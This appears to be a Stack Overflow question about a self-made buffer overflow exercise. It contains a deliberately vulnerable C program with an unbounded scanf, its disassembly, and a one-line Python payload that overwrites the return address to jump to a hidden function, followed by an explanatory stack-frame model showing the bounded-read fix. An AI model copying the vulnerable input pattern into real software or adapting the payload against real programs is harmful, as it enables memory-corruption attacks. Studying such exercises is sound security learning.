I am trying this code for a buffer overflow exploit. I compiled the code using gcc for 64 bit, disabled ASLR and allowed stack smashing. I am not very good at reading assembly code, but what I understood from the code was that 32 bytes (0x20) of memory was reserved for local variables, which included the buffer (0x20). So I ran the Python code to print 40 bytes (32 bytes + 8 bytes for rbp) of junk + the address of secretFunction(). I am getting 'Segmentation Fault'. How do I fix this?
Here is the C code:
#include <stdio.h>

void secretFunction(){
    printf("You are now inside the secret function!\n");
}

void echo(){
    char buffer[20];                  /* 20-byte stack buffer */
    printf("Enter some text\n");
    scanf("%s", buffer);              /* no length limit: input longer than the buffer overruns it */
    printf("You entered : %s\n", buffer);
}

int main()
{
    echo();
    return 0;
}
This is how I compiled:
gcc main.c -o example -fno-stack-protector
And here is part of the assembly code:
0000000000001189 <secretFunction>:
1189: f3 0f 1e fa endbr64
118d: 55 push %rbp
118e: 48 89 e5 mov %rsp,%rbp
1191: 48 8d 3d 70 0e 00 00 lea 0xe70(%rip),%rdi # 2008 <_IO_stdin_used+0x8>
1198: e8 d3 fe ff ff callq 1070 <puts@plt>
119d: 90 nop
119e: 5d pop %rbp
119f: c3 retq
00000000000011a0 <echo>:
11a0: f3 0f 1e fa endbr64
11a4: 55 push %rbp
11a5: 48 89 e5 mov %rsp,%rbp
11a8: 48 83 ec 20 sub $0x20,%rsp
11ac: 48 8d 3d 7d 0e 00 00 lea 0xe7d(%rip),%rdi # 2030 <_IO_stdin_used+0x30>
11b3: e8 b8 fe ff ff callq 1070 <puts@plt>
11b8: 48 8d 45 e0 lea -0x20(%rbp),%rax
11bc: 48 89 c6 mov %rax,%rsi
11bf: 48 8d 3d 7a 0e 00 00 lea 0xe7a(%rip),%rdi # 2040 <_IO_stdin_used+0x40>
11c6: b8 00 00 00 00 mov $0x0,%eax
11cb: e8 c0 fe ff ff callq 1090 <__isoc99_scanf@plt>
11d0: 48 8d 45 e0 lea -0x20(%rbp),%rax
11d4: 48 89 c6 mov %rax,%rsi
11d7: 48 8d 3d 65 0e 00 00 lea 0xe65(%rip),%rdi # 2043 <_IO_stdin_used+0x43>
11de: b8 00 00 00 00 mov $0x0,%eax
11e3: e8 98 fe ff ff callq 1080 <printf@plt>
11e8: 90 nop
11e9: c9 leaveq
11ea: c3 retq
00000000000011eb <main>:
11eb: f3 0f 1e fa endbr64
11ef: 55 push %rbp
11f0: 48 89 e5 mov %rsp,%rbp
11f3: b8 00 00 00 00 mov $0x0,%eax
11f8: e8 a3 ff ff ff callq 11a0 <echo>
11fd: b8 00 00 00 00 mov $0x0,%eax
1202: 5d pop %rbp
1203: c3 retq
1204: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
120b: 00 00 00
120e: 66 90 xchg %ax,%ax
And lastly, here is the Python code used at run time:
python -c 'print "a"*40 + "\x89\x11\x00\x00\x00\x00\x00\x00"' | ./example
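The frame layout the question reads off the disassembly (0x20 bytes reserved at -0x20(%rbp) for the buffer, then the saved rbp, then the return address) can be modelled to show why an unbounded scanf("%s") reaches the return slot after 40 bytes and why a bounded read never does. This is an added example, not code from the question; the struct frame, the sentinel values and the all-'a' input are a constructed model of the stack, not the real one.

```c
#include <stdio.h>
#include <string.h>
/* Constructed model of echo()'s frame as the disassembly lays it out: 0x20
 * bytes at -0x20(%rbp) holding the 20-byte buffer, then the saved rbp, then
 * the return address pushed by main's callq. A struct only models the frame. */
struct frame {
    char buffer[32];               /* char buffer[20] lives in these 0x20 bytes */
    unsigned long long saved_rbp;  /* 8 bytes at 0(%rbp), from "push %rbp" */
    unsigned long long ret_addr;   /* 8 bytes at 8(%rbp), where echo returns to */
};

#define SENTINEL_RBP 0x1111111111111111ULL
#define SENTINEL_RET 0x2222222222222222ULL

/* What scanf("%s", buffer) does: stores every input byte, so bytes 32..39
 * land on the saved rbp and 40..47 on the return address. The cap keeps this
 * model well defined; the real scanf("%s") has no cap at all. */
static void write_unbounded(struct frame *f, const char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, in, n);
}

/* The fix: scanf("%19s", buffer) or fgets(buffer, 20, stdin) store at most
 * 19 bytes plus the terminator in a 20-byte array. */
static void write_bounded(struct frame *f, const char *in, size_t n) {
    if (n > 20 - 1) n = 20 - 1;
    memcpy(f->buffer, in, n);
    f->buffer[n] = '\0';
}

/* Feeds input_len bytes of 'a' through one routine and reports a bitmask:
 * 1 = saved rbp overwritten, 2 = return address overwritten. */
int frame_damage(int bounded, size_t input_len) {
    struct frame f;
    char input[64];                       /* constructed input, all 'a' */
    memset(input, 'a', sizeof input);
    if (input_len > sizeof input) input_len = sizeof input;
    memset(f.buffer, 0, sizeof f.buffer);
    f.saved_rbp = SENTINEL_RBP;
    f.ret_addr = SENTINEL_RET;
    if (bounded) write_bounded(&f, input, input_len);
    else write_unbounded(&f, input, input_len);
    return (f.saved_rbp != SENTINEL_RBP) | ((f.ret_addr != SENTINEL_RET) << 1);
}

int main(void) {
    printf("scanf(\"%%s\") with 41 bytes: damage=%d\n", frame_damage(0, 41));
    printf("bounded read with 41 bytes: damage=%d\n", frame_damage(1, 41));
    return 0;
}
```

With 40 bytes the model reports only the saved rbp clobbered; the 41st byte is the first to touch the return slot, which is why the question's payload puts the address right after 40 bytes of padding, and why the bounded read reports no damage at any length.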
question from:
https://stackoverflow.com/questions/65862659/buffer-overflow-exploit-getting-segmentation-fault